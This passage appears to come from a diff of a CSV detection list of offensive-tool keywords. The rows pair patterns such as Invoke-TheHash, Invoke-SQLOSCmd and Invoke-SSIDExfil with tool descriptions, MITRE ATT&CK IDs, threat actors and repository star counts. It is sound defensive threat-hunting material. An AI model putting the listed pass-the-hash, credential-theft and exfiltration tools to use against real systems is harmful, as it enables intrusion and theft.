TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SQLDumpInfo*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*Invoke-SQLOSCmd -Instance * -Command *","offensive_tool_keyword","AD exploitation cheat sheet","Run command (enables XP_CMDSHELL automatically if required)","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*Invoke-SQLOSCmd.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-SQLOSCmd.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-SQLOSCmd.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1096","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-SQLUncPathInjection*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-SSHCommand.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1094","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-SSIDExfil*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Invoke-StandIn.*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SQLOSCmd.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-SQLOSCmd.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-SQLOSCmd.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1096","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-SQLUncPathInjection*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SSHCommand.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1094","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-SSIDExfil*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-StandIn.*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" "*invokestealthuserhunter*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Invoke-StealthUserHunter*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" -"*Invoke-StickyNotesExtract*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SystemStartupCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-StickyNotesExtract*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SystemStartupCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" "*Invoke-SystemStartupHistoryCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-SystemStartupHistoryCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-Tater.*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-Tater.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-Tater.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1119","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-TcpEndpointsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-SystemStartupHistoryCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-Tater.*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-Tater.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Tater.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1119","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-TcpEndpointsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" "*Invoke-TheHash*","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","10","10","1345","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" "*Invoke-TheHash.ps1*","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","1","N/A","10","10","1345","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" "*Invoke-TheHash.psd1*","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","1","N/A","10","10","1345","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" "*Invoke-TheHash.psm1*","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","1","N/A","10","10","1345","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" -"*Invoke-TheKatz*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-ThirdPartyDriversCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-ThreadedFunction*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - 